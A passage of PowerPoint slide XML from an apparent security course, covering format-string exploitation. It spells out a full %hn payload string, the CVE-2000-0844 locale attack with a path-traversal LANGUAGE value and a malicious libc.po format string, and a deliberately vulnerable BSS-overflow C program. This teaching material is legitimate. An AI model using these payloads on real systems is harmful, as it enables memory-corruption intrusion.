              <a:t>To write a value that ends in 0xff (255) we need to produce </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>255 - 211 = 44 characters:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%44x%hn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since the last value is the same we can simply repeat: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>hn</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Final string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbc</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xffAAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbd</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xffBBBB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>xbe</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xbf</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\xff%20x%20x%28x%28x%hn%91x%hn%44x%hn%hn</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20017644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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The locale attack (CVE-2000-0844)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1000451" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The localization system contains a database to translate error messages, formats, etc. in a language other than English</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g.: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/lib/locale/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/LC_MESSAGES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is possible to specify the language in the language variable (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When an error is found the language database is searched  for the right message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a vulnerable implementation, it was possible to specify a user-provided language file</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LANGUAGE=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>it_IT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/../../../../../../../</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="864259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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>LC_MESSAGE/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>libc.po</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1002499" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msgid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> "%s: invalid option -- %c\n"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:ea typeface="MS Mincho" pitchFamily="49" charset="-128"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>msgstr”%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%.8x%63222c%hn%50561c%hn\n"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16104429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dirty="0"/>
              <a:t>Lessons Learned</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1011715" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whenever an attacker can control the format string of a function such as *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>() and syslog(), there is the potential for a format string vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fprintf(f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(f, “%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>name_str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) GOOD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var_i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var_j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) still BAD</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Format string attacks are made possible by the lack of parameter validation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="419031136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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Where is Overwritten: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DATA and BSS Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="630787" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>#define MAX_STR_LENGTH 16</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>/* These variables will be allocated in the BSS */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>buffer[MAX_STR_LENGTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>static char *filename; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>main(int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>[]) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0, count = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf[BUFSIZE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  filename = argv[1];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>checkfile(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>(buffer, argv[2]); // overwrites *filename</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>open(filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, O_RDONLY);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  do {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      count = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read(fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      write(0, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>read_buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>, count);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  } </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>while(count</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> == BUFSIZE);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
